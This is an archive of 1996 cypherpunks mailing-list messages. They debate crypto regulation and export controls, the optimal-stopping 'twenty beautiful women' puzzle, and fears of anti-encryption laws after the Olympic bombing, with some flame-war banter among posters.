Content-Type: text/plain


From: 	Bill Stewart

You fail to understand the precisely reasoned Aristotelian syllogistic
logic of Ms. Rand's position (you heretic!):

        1) Smoking is a result of fire.
        2) Fire is cool.
        3) Therefore, smoking is cool.
                Q.E.D.

        4) Logic is cool, and non-logic is non-cool
        5) We're cool
        6) Therefore, light up that cigarette or be excommunicated!
                Q.E.D.
.....................................................................


I don't remember reading anything about Ayn Rand insisting that her followers smoke, although I've read many of the Objectivist newsletters which were published for some time and read Barbara Branden's biography of her (I must have missed those parts).

I do remember somewhat her description of what smoking meant to her and know that it was a very important symbol in her life.  If her followers saw fit to emulate her on account of a mere symbol to the detriment of their health, and if this was at Rand's insistence, then I would say that they were demonstrating the principle which Rand also illustrated in her books, that being "the sanction of the victim".   

Ironic, huh.   Sometimes you can identify the things that are far enough away to see, but not the ones that are too close to notice.

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 28 Jul 1996 10:16:44 +0800
To: Erle Greer <vagab0nd@sd.cybernex.net>
Subject: Re: Public vs. Private Munitions
In-Reply-To: <2.2.32.19960727192453.0069bd10@mail.sd.cybernex.net>
Message-ID: <Pine.LNX.3.94.960727202420.208A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 27 Jul 1996, Erle Greer wrote:

> Here's how I understand it:
>      The U.S. Government, concerned only with making America a safer place
> for us taxpayers to live in, wants to regulate domestic encryption in order
> to have access to the content of all transmissions.  Their theory is that
> any cryptosystem that is stronger than their cryptanalysis systems can be
> used in illegal transmissions and should be considered munitions.
>      Theoretically, the government should only be have the resources to
> control commercially-available, public encryption systems.  Who is to stop
> anyone from designing their own cryptosystem for personal use?  If the
> government intercepted a transmission from this private cryptosystem, and
> could not decrypt it, would they assume that it must be considered
> munitions?  Similarly, anyone could send uniformly-formatted random garble
> that could also be considered munitions, or at least waste the governments
> processing time.
>      Why are we so worried about government regulation?  Can't we just
> devise our own cryptosystems and just don't sell them or make them publicly
> available?

If encryption is regulated and outlawed, then Joe Sixpack won't have access to
any none Government Approved encryption algorithms.  I may still have access
to strong crypto, but if it isn't widespread, I won't be able to use it very
effectively.  As to your question about whether random data would be outlawed,
it certainly wouldn't surprise me.  Of course, one could always apply for
permission to transmit random data that is not used to transmit encrypted
information from the government.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfq1BbZc+sv5siulAQE8pQP/YtLpV65vtOEDhCO7DcEiOqiNEc6Y/xy8
gyN80IOH+lpKX72nZF8bK+iQUj0ho4MtyPIFEoCorO72FP0gyMDPBMgi7aBcvchS
p25TNlUsTMvCxbbrPuZ7plZNMEfrZz7vqUpOd2IbFd5mIBg0lRqWtegLeIOGV410
uguC7XNsl6I=
=P0ky
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 28 Jul 1996 10:49:53 +0800
To: cypherpunks@toad.com
Subject: Re: Questions...
In-Reply-To: <Pine.SV4.3.91.960727120905.18625H-100000@larry.infi.net>
Message-ID: <so4qRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> writes:

> > Hello, I would rather I not be too blunt, but despite my generous
> interest in computer > hacking cracking, and other such related topics, I
> have come to be confused by the > mailer, can I ask any questions that I
> wish, or am I limited by some type of header > subject?
>
>
>
> Shaun, let me explain. There's a committee of seven people. Me, Tim May,
> David Sternlight, some assination-politics guy, some guy named Vultis or
> somesuch, and so on.
>
> Only if we're in unanimous agreement on the outcome of an issue, may you
> start a thread on a new topic. which then continues till the first
> posting which calls someone a Nazi.

No, no, this is all wrong. There's a guy named Lance Deitweller and he has
fun posting as different people and posting under different names. Sometimes
Lance's different personalities (he calls them "tentacles") even argue with
one another!

These posters have been definitevely shown to be Lance's tentacles:
Alan Olsen (Lance posing as friend of vegetables)
"Dr." David Sternlight
Igor Chewed-Off
Jim Bell (talk.politics.assassination)
Black Unicorn
"Tim May" (Lance is pretending to be senile)
Vladimir Z. Nuri (Lance's parody of a Brighton Beach Sovok)

None of these people are real in any sense. It's just Lance playing games.

As for the creative misspellings of my family name, Igor Ch. used to have
a collection: Vulvis, Vilus, Vul(gar)is, what you get when you cross a
vulva and a penis, etc, etc. Igor will probably post whatever I missed.

ObGodwin: David C [no dot] Lawrence is a Nazi.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 28 Jul 1996 13:31:48 +0800
To: "cypherpunks@toad.com>
Subject: RE: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <01BB7BFD.3CA047A0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	James A. Donald

> Some implications of Tim's view is that all our rights are basically a
> transitory agreement between individuals.

Tim may or may not believe this, but that is not a consequence of his
views.  The schelling point theory of rights is substantially equivalent
in practice to "We hold these truths to be self evident."
.............................................................................


Oh.  I thought it was "we hold these truths to be too uneconomical for us to deal with".

On a side note, I was thinking some time ago about situations in far off places in Europe where some people are mistreating others in the most horrendous ways (like Bosnia where the males are being beaten, the females are being raped).  The news services report to us what is happening and so we know all about it, and we may feel the greatest sympathy for them, but yet be unable to render assistance - sufficient assistance - to be of any real help, from lacking the resources necessary to do what would be required.

So here is an example where one would be moved, not to impose one's view of what is right or wrong, but to provide relief to those suffering, based on one's sense of injustice, yet likewise calculate that it would not be feasible to take action, reasoning that the cost would be excessive; too burdensome.

   ..
Blanc







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 28 Jul 1996 13:48:06 +0800
To: ichudov@algebra.com
Subject: Re: Twenty Beautiful Women
In-Reply-To: <199607280248.VAA20048@manifold.algebra.com>
Message-ID: <199607280354.UAA06579@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

 > Also, I would appreciate if someone specified what exactly
 > the goal function is.

Me too.

This is an interesting problem, vaguely reminescent of the pie
judging contests commonly used as examples of non-parametric
statistics.  Given two pies, (or two women), a judge can
subjectively order them by tastiness, (or beauty), but there is
no concept of an continuous metric in which the ratings of
particular items are embedded.

This makes it somewhat difficult (at least for me) to determine
the function being maximized in this problem.  Do we mean a
strategy which gives the highest probability of choosing the most
beautiful woman over all possible orderings? If not, then we need
some way of saying whether we value N dates with the woman having
rank I over M dates with the woman having rank J, which requires
information the problem does not give us.  The first case is
ambiguous, since there are numerous strategies which differ only
in the probability of selecting items having other than the
highest rank, and the second implies the existence of some sort
of metric.

Indeed, what a person would regard as an strategy maximizing the
chances of choosing the "best" item overall depends very much
upon the choice of such a metric.  If we have 20 women whose
attractiveness is evenly spaced, one might proceed quite
differently than if the top 18 were attractive and almost
indistinguishable, and the other two had a contagious and fatal
disease.

If we make the leap of assigning the integers 1 to 20 to the
individuals, and seek a strategy which maximizes the mean
attractiveness over all possible orderings, then the problem can
be solved by backtracking from the last choice made.  This
results in a variable threshold at each stage in which we select
the current candidate if its rank in the items seen so far
exceeds the threshold, and proceed if this is not the case.

If we want a single partition point at which we choose the first
item better than any item before the partition point, then 1/e
seems believable, although I haven't personally worked out the
math.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Sun, 28 Jul 1996 06:28:13 +0800
To: CP <cypherpunks@toad.com>
Subject: Re: The Four Horsemen Go to the Olympics!
In-Reply-To: <Pine.SOL.3.91.960727112449.29476A-100000@condor.depaul.edu>
Message-ID: <9607272054.aa22855@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <Pine.SOL.3.91.960727112449.29476A-100000@condor.depaul.edu>, Nathan
 Syfrig writes:
>This is very worrysome, as it truly is a "world stage" event that could 
>really serve to galvanize various governments into uniting against strong 
>non-escrowed crypto.  Hey, it will look good for the international PR, 
>never mind the fact that not everybody will be so 'diligent' in registering 
>their keys and/or use the "approved" crypto.

	Depends how quickly they track down the bombers, a quick arrest gives
little incentive, but a drawn-out search may encourage a knee-jerk response.

	Seeing as this is an election year, Clinton may try to make himself
look more decisive to avoid accusations of indecision, so he may introduce some
harsh measures.

	Here's an aside about Irish politics:

	About a month ago, one of Ireland's top journalists was shot dead; the
suspicion fell on one of Dublin's crime bosses. (Veronica Guerin investigated
organised crime in the last few years.) Now there is a lot of legislation being
rushed into place that I think is badly thought out (e.g. extending detention
to seven days with a judge's permission, weakening the right to silence in drug
cases) and I think it will lead to innocent people being jailed with little
effect on the crime bosses. (I don't think there is a government cover-up in
this case, just a panic.)

	The assasination was the catalyst for harsh measures, though the Irish
government hasn't had the catalogue of events like the Oklahoma bombing to
make it move towards the draconian end of things, though that is weakening.
(True, there is the situation where the government response to IRA behaviour
has been very strict, for instance censoring Sinn Fein and IRA, though that
case of censorship was dropped a couple of years back. The patronising side
of Irish political culture probably dates back to the '20s, when the state was
founded, and the '30s or '40s when the latest draft of the constitution was
drawn up.)

	(For what it's worth, the Irish Government seems to have little or
no opinion on encryption, though one TD seems to be for censoring certain
sites. TD = a member of the Irish parliament.)

>And of course, this country just purchased another IBM computer for 
>"nuclear simulation".  Gee, I wonder what else that power might be used 
>for?  (but then again, it's from IBM, purveyor of the Olympics computer 
>services)

	There's an IBM ad running on British TV stations where Spinal Tap
decide to get IBM to help them with their current tour. One reason is that IBM
is doing this for the Atlanta Olympics. O, the irony!!! (Spinal Tap seem to
have survived their trip to Springfield.)

	Derek - enough rambling for now






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 28 Jul 1996 14:20:31 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Twenty Beautiful Women
Message-ID: <199607280429.VAA06199@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:48 PM 7/27/96 -0500, Igor Chudov @ home wrote:
>Timothy C. May wrote:

>> While there is some chance that one will get to #20 and find that none of
>> #8-20 were better than #1-7, this strategy is the best compromise between
>> "committing too early" and "waiting too long."
>
>This "some chance" is 1/e (for a very large number of women), obviously.
>
>There is 1/e chance that the best woman will be in the first 1/e 
>fraction of women.
>
>Also, I would appreciate if someone specified what exactly the goal 
>function is.
>
>	- Igor.


"Come again?"

[quickly ducking...]


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Sun, 28 Jul 1996 12:29:12 +0800
To: "'cypherpunks@toad.com>
Subject: cypherpunks vs hackers
Message-ID: <01BB7C70.6F8B4480@ip68.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


How can we differentiate cypherpunks to hackers? What are their attitudes, psychological thinking, main objective?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 28 Jul 1996 12:46:05 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Twenty Beautiful Women
In-Reply-To: <ae2005a310021004b85c@[205.199.118.202]>
Message-ID: <199607280248.VAA20048@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
> >Twenty beautiful women are to pass before you, one by one (or 20 handsome
> >men). You see only one at a time. You cannot speak to them. After seeing
> >any one, you must pick her or reject her. If you reject her, you cannot
> >change your mind. If you pick her the exercise terminates.
> >
> >What is the optimal strategy for insuring you get the most beautiful woman
> >possible under the circumstances?
> 
> Look at the first 1/e of them, or about the first 36.8% of them. In this
> case, the first 7 of them. Then pick the first one after this group which
> is better than any of the first group.
> 
> While there is some chance that one will get to #20 and find that none of
> #8-20 were better than #1-7, this strategy is the best compromise between
> "committing too early" and "waiting too long."

This "some chance" is 1/e (for a very large number of women), obviously.

There is 1/e chance that the best woman will be in the first 1/e 
fraction of women.

Also, I would appreciate if someone specified what exactly the goal 
function is.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 28 Jul 1996 11:39:31 +0800
To: Mike van der Merwe <mikev@is.co.za>
Subject: Re: Olympic bombing
In-Reply-To: <Pine.GSO.3.95.960727172741.11971E-100000@admin.is.co.za>
Message-ID: <Pine.SOL.3.91.960727215455.13339A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Just heard Newt mumbling about the need for better intelligence 
monitoring and *more* "anti-terrorist" legislation.

Bet you're right.

bd


On Sat, 27 Jul 1996, Mike van der Merwe wrote:

> 
> Hi all
> 
> I can just see the FBI screaming "we need weaker encryption to combat
> terrosism on US soil" with nasty effects -- it seems all to many people,
> lawmakers included, will be only to happy to sacrifice their privacy that
> the FBI can better combat these terrorist acts (which could *of course*
> could been prevented had only the FBI been able to read their encrypted
> mail...)
> 
> Somehow I got the feeling watching CNN that the FBI was given a shitload
> of ammo. Call me cynical but the Reichstag fire comes to mind... 
> 
> Later
> Mike
> 
> ___________________
> 
> "Those that give up essential liberty to obtain a little temporary
>  safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 28 Jul 1996 13:29:29 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: Twenty Beautiful Women
In-Reply-To: <v03007801ae20758ab052@[192.187.162.15]>
Message-ID: <199607280325.WAA20204@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


David Sternlight wrote:
> At 10:29 AM -0700 7/28/96, Timothy C. May wrote:
> >Look at the first 1/e of them, or about the first 36.8% of them. In this
> >case, the first 7 of them. Then pick the first one after this group which
> >is better than any of the first group.
> >
> >While there is some chance that one will get to #20 and find that none of
> >#8-20 were better than #1-7, this strategy is the best compromise between
> >"committing too early" and "waiting too long."
> 
> Correct.
> 

Prove it.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Sun, 28 Jul 1996 13:43:39 +0800
To: The Deviant <cypherpunks@toad.com
Subject: Re: Why <jf_avon@citenet.net> was blocked.
Message-ID: <2.2.32.19960728035209.00727a9c@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


>Umm.. when telling other ppl that they do not know how to read, it might
>be usefull to use sentances with a subject AND a predicate.  I know that
>this is something they taught you _way_ back in second grade, but you
>should still remember it.
>
> --Deviant

I'm not even going to comment on the twentieth word here.  Nope.  Not
gonna'.  Can't make me.  No way.
vagab0nd@sd.cybernex.net
http://ww2.sd.cybernex.net/~vagab0nd/index.html
Visit web page for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 28 Jul 1996 19:51:58 +0800
To: ichudov@algebra.com
Subject: Re: Twenty Beautiful Women
Message-ID: <v02120d17ae20b5c23ccc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:54 7/27/96, Mike Duvos wrote:
>ichudov@algebra.com (Igor Chudov @ home) writes:
>
> > Also, I would appreciate if someone specified what exactly
> > the goal function is.
>
>Me too.

For clarification, the problem is often stated in textbooks similar like this:

You ask someone to write one number each on ten pieces of paper without you
being able to see the numbers. The person may use any number from 1 to
10^99, but may not use a number twice. The person turns over the ten
papers.

You goal is to determine the paper with the highest number [rules apply as
described in the original post]

The general solution is to flip over 1/e papers and choose the paper that
has a higher number on it than any of the 1/e papers turned over at first.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 28 Jul 1996 19:48:04 +0800
To: cypherpunks@toad.com
Subject: Re: Public vs. Private Munitions
Message-ID: <199607280635.XAA10977@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:24 PM 7/27/96 -0500, Erle Greer <vagab0nd@sd.cybernex.net> wrote:
>     Theoretically, the government should only be have 
> the resources to control commercially-available, public
> encryption systems.  [...]
>     Why are we so worried about government regulation?  
> Can't we just devise our own cryptosystems and just don't 
> sell them or make them publicly available?

Theoretically, the First Amendment says you can say or write
anything you want.  In practice, the Supremes have said it means
far less than that; during some of their worst years they
approved convicting people for speaking against the draft
because it interfered with the US ability to conduct a war
it hadn't yet gotten into, and they've generally held that
commercial speech doesn't rate the same protection as
political speech.  Feh!

Theoretically, on the other hand, the US Government has the 
power to regulate interstate commerce.  (A bad idea, in my opinion,
though taking that power away from the states was clearly good.)
In practice, the Supremes have let the Congress get away with
all sorts of abuses, like banning a farmer from growing grain
on his own land and feeding it to his own hogs, and banning
citizens from growing or manufacturing their own drugs because
it's difficult to tell whether a given bunch of drugs was
really grown in the state it's in or bought from out of state.

Various government officials have taken the position that
giving a university class on encryption is restricted by ITAR;
Dan Bernstein's lawsuit against them is off to a very good start.
This isn't even distributing products - this is discussing math.
It's potentially illegal for me to even write the evil equations
in this mail message, since it's going to foreigners.
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <vagab0nd@sd.cybernex.net>
Date: Sun, 28 Jul 1996 14:34:52 +0800
To: cypherpunks@toad.com
Subject: Re: Public vs. Private Munitions
Message-ID: <2.2.32.19960728043610.00693fa8@mail.sd.cybernex.net>
MIME-Version: 1.0
Content-Type: text/plain


At 11:25 AM 7/28/96 -0700, you wrote:
>At 7:24 PM 7/27/96, Erle Greer wrote:
>
>>     Theoretically, the government should only be have the resources to
>>control commercially-available, public encryption systems.  Who is to stop
>
>While I'm not exactly sure what you mean by a "commercially-available,
>public encryption system," I think your point is incorrect.

I didn't mean that I think that the govt should be allowed to control.  I
meant that govt would only be able to regulate commercial and/or public
systems.  They, of course, would have no say in the specs of my
personally-written cryptosystem.

>(My confusion is that a commercially-available system is not necessarily a
>"public" system, if by public one means public domain. If one means
>"published specifications," still not the case. Confusing.)

Sorry about the confusion.  Although I may have used the two terms loosely,
I was trying to contrast commercial and public against something written in
secret and not offered for govt approval.

>Howver, the government cannot step in and "control" a
>commercially-available product, by even the most liberal interpretations of
>the commerce clause. "Tim's Pretty Flaky Snakeoil System," for example. I
>can announce it, sell it, and the government is powerless to "control" it.
>(Even if it were "public.")
>
>If by "public" you mean an NBS or NIST standard, like DES, then I suppose
>the government can in some sense "control" it. (Even this is iffy, IMO, as
>I know of no rules saying DES implementations must be approved by NIST or
>anyone else.)
>
>>anyone from designing their own cryptosystem for personal use?  If the
>>government intercepted a transmission from this private cryptosystem, and
>>could not decrypt it, would they assume that it must be considered
>>munitions?  Similarly, anyone could send uniformly-formatted random garble
>>that could also be considered munitions, or at least waste the governments
>>processing time.
>
>Most of the cryptosystems are not under the "control" of the government,
>even by the standards of your first definition. Period. RSA is not a
>government-controlled system, though it is both "commercially-available"
>AND "public" (in that the spec and algorithm are clearly published).
>
>And the talk about "personal use" is misleading, IMO. It suggests that
>government can and should regulate use for "business purposes" but not
>personal uses. I disagree with this distinction.

Absolutely not!  Let me clarify that I feel that the govt should have no
part in crypto regulation, be it commercial, public, private, business, etc.

>>     Why are we so worried about government regulation?  Can't we just
>>devise our own cryptosystems and just don't sell them or make them publicly
>>available?
>
>You mean the way public key systems in general and  RSA in particular were
>invented and devised by non-government folks?

After some responses and some thought, I have seen the error in my thinking.
Having a secret, proprietary cryptosystem would loose the public-key benefit.
It would be fine, I believe, for point-to-point communications though.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 28 Jul 1996 19:52:19 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Beautiful Women
In-Reply-To: <ae20465614021004eb6f@[205.199.118.202]>
Message-ID: <199607280642.XAA08454@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:

 > You're both reading far too much into this problem. David
 > S. specified "beauty," the personal judgment of the chooser.
 > No deep philosophical meaning.

Which means that given two candidates, we can order them with
regard to beauty.  No other information is implied.

 > Perhaps an equivalent formulation will make this clearer:

 > One is passing through a town with 20 gas stations, with
 > gas at various prices. The stipulation is that one cannot
 > turn around. Once a gas station has been passed, there's no
 > turning back. So, what is the best strategy for finding the
 > lowest gas price (or shortest lines, or cleanest
 > appearance, or brightest sign, or whatever one wants to
 > analyze). Or even by the most beautiful girl standing in
 > front, to return us to the original statement.

 > So, you see, the problem is well-defined, with an elegant
 > solution.

Ahem.  I think the sticking point here lies in the translation of
the phase "lowest gas price" into the appropriate function to be
minimized.

Suppose we have 20 gas stations with prices p[1] through p[20]
which we have an equal chance of encountering in any of the 20!
possible orders while driving through town.  We have a
deterministic strategy for picking a station to buy gas at which
tells us whether or not to buy at the current station as a
function only of the rankings of the prices of gas at stations so
far encountered, including the current one.

This strategy maps every one of the 20! permutations of the gas
stations into one of the 20 prices, namely the price at which we
purchase gas by applying the specified strategy when stations are
encountered in the given order.

Finding the "best" strategy implies that we have some function
whose domain is the set of such strategies, and whose output is a
real number, such that the "best strategy" is one for which this
number is minimized.  Calling this function the "lowest gas
price" is somewhat misleading, since there are a variety of
different notions of "average" we may use to condense the 20! gas
prices a given strategy generates into a single number.

If we were concerned about our wallets, we would probably want
the strategy such that the arithmetic mean of gas prices was
minimized over all orderings of stations, but this is a
parametric notion, and requires that we know specific numeric
values of prices, and not simply whether one price is bigger than
another.

Non-parametrically speaking, the only obvious way of ordering
strategies is lexographically, where a strategy which yields more
occurrences of the lowest ranked price is better than one which
yields less, and if two strategies are equal in their yields of
the N lowest ranked prices, we then compare them on the price
ranked N+1.

This is a function only of the relative rankings, but may not
necessarily choose the strategy which on average results in the
expenditure of the least amount of money.

So while the solution may be elegant, I would argue that the
problem, as given, is far from "well-defined", unless some
explicit metric which admits arithmetic means is introduced.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 28 Jul 1996 13:40:59 +0800
To: cypherpunks@toad.com
Subject: NEW: E-LEX - electronic lexicons
Message-ID: <v03007601ae2095588c67@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


For all you dictionary attackers out there...

;-)

Cheers,
Bob

--- begin forwarded text


Date:         Sat, 27 Jul 1996 22:17:03 -0500
Reply-To: "Sean M. Burke" <sburke@babel.ling.nwu.edu>
Sender: NEW-LIST - New List Announcements <NEW-LIST@LISTSERV.NODAK.EDU>
From: "Sean M. Burke" <sburke@babel.ling.nwu.edu>
Subject:      NEW: E-LEX - electronic lexicons
To: Multiple recipients of list NEW-LIST <NEW-LIST@LISTSERV.NODAK.EDU>

E-LEX on listproc@listserv.acns.nwu.edu

E-LEX is a new email list for the discussion of the design of dictionaries
with electronic interfaces.

Topics may include:
        * the possibilities of hypertext/hypermedia for the electronic
                interface
        * adaptation of machine-readable dictionaries to user-friendly
                human-usable form
        * issues in conversion and adaptation of paper dictionaries to
                electronic form

The list's new homepage is at http://www.ling.nwu.edu/~sburke/e-lex/

To subscribe to E-LEX, send a message to listproc@listserv.acns.nwu.edu
containing this line in the message body:

        subscribe E-LEX Your Name

Owner:  Sean M. Burke  sburke@babel.ling.nwu.edu

                                 -------
Use this information at your own risk.  For more information and disclaimer
send E-mail to LISTSERV@LISTSERV.NODAK.EDU with the command  INFO NEW-LIST
in the body.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 28 Jul 1996 20:07:18 +0800
To: cypherpunks@toad.com
Subject: Re: Twenty Beautiful Women
In-Reply-To: <v02120d17ae20b5c23ccc@[192.0.2.1]>
Message-ID: <199607280701.AAA09887@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:

> For clarification, the problem is often stated in textbooks similar like this:
> 
> You ask someone to write one number each on ten pieces of paper without you
> being able to see the numbers. The person may use any number from 1 to
> 10^99, but may not use a number twice. The person turns over the ten
> papers.
> 
> You goal is to determine the paper with the highest number [rules apply as
> described in the original post]
> 
> The general solution is to flip over 1/e papers and choose the paper that
> has a higher number on it than any of the 1/e papers turned over at first.

Stated this way, I suppose strategy A is better than strategy B if after
an arbitrarily large number of trials, N(A>B) > N(B>A).

It is still unclear that such a notion translates smoothly into notions
like "lowest gas price", where buying once at a station that is half
the price beats buying a dozen times at a station that is only one 
cent less.  

It does translate perfectly well into the original problem of picking
subjectively beautiful women, however, which is also non-parametric in
a similar way.  It would be nice to see a short proof that for the
optimal solution, the threshold is the max of the first 1/e elements, 
and is not a function of how many steps have been taken. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Date: Sun, 28 Jul 1996 20:16:21 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
Message-ID: <v03007604ae20d2608bc5@[204.179.128.60]>
MIME-Version: 1.0
Content-Type: text/plain


AT  Sat, 27 Jul 1996 16:14:24 Alan Olsen wrote

>I beleive that there is alot that can be done to influence the public to be
>pro-crypto.  With the proper memes, you can reveal the flaws in the
>anti-privacy forces arguments.
>
>Here are a few in no particular order...
. <SNIP>
>Offer to sponsor a crypto archive and discussion area on a local BBS.  Keep
>it current.  Get others interested.  Spread the tools and teach people how
>to use them.
>

actually this is the major reasons that I am doing the Macintosh Crypto
conference at apple Sept 5/6.I want to educate mac developers about crypto.
(with or without mr may)  Maybe, Just maybe one of these guys will go out
and write  great crypto program (like a Kid-Crypto..Kidpix clone) that will
let the average joe use crypto.

as things stand now, windoze folks are going to have to  settle with
Mcro$ofts Access to Keys...MAK or is it Bill's Access to Keys.. BAK in any
case I didnt want to get into a my pulldownmenu is longer than your
pulldownmenu argument.. I just want to see it get on the radar fo people
who code.

You see I dont care what your favorite platform is,( if you like editing in
VI fine, I personnly like TECO), BUT  I am acting localy, doing my part,
not just complaining about it... So if you want to help, I am still looking
for folks to talk... maybe about why crypto is so important.
Crypto-archarchy. or maybe some e$ stuff would be nice...



Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 28 Jul 1996 10:28:24 +0800
To: cypherpunks@toad.com
Subject: BCI_sys
Message-ID: <199607280037.AAA18224@pipe6.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-27-96. WaPo: 
 
   A report on the Army's Battlefield Combat Identification 
   System (BCIS), designed by TRW, which identifies friendly 
   targets through triple-checked microwave pulses, encrypted 
   signals that change frequencies 43 times a second to 
   resist jamming or detection by the enemy. 
 
   (The roasting of friendlies depicted in "Courage Under 
   Fire" is cited as firing increased public interest.) 
 
   ----- 
 
   http://jya.com/bcisys.txt  (14 kb) 
 
   BCI_sys 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 28 Jul 1996 14:56:34 +0800
To: cypherpunks@toad.com
Subject: Re: WaPo on Crypto-Genie Terrorism
Message-ID: <199607280458.AAA27199@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 27 Jul 96 at 19:21, John Young wrote:

>    The Washington Post, July 27, 1996, p. A22. 
>    Speaking in Code on the Internet ... [Editorial] 

Some bothersome things about this editorial...

[..]
>    security of their data. They also see it as a market in 
>    which the United States maintains a comfortable lead, one 
>    that is threatened if domestic encryption makers can't sell 
>    their products elsewhere. The makers argue that foreign 
>    encryption software will rush in to fill the gap, doing 
>    nothing about the uncrackability problem -- indeed, making 
>    it worse. The administration in turn is pursuing a wider 

IMO, the US does not have a comfortable lead. It's already falling 
behind considering some of the stronger crypto programs available (at 
least as freeware) are made outside the US.  Many of the stronger 
algorithms were invented outside of the US (IDEA for instance).

[..]
>    with wiretapping. Mr. Freeh, testifying at Thursday's hearing in
>    favor of an optional key escrow plan, noted that the point is not
>    to prevent all  copies of uncrackable code from going abroad --  that's 
>    clearly impossible -- but to prevent such high-level code 
>    from becoming the international standard, with architecture 
>    and transmission channels all unreadable to world 
>    authorities. To software companies and Internet users who 

So why should criminals bother with using standards if they are 
readable by authorities?

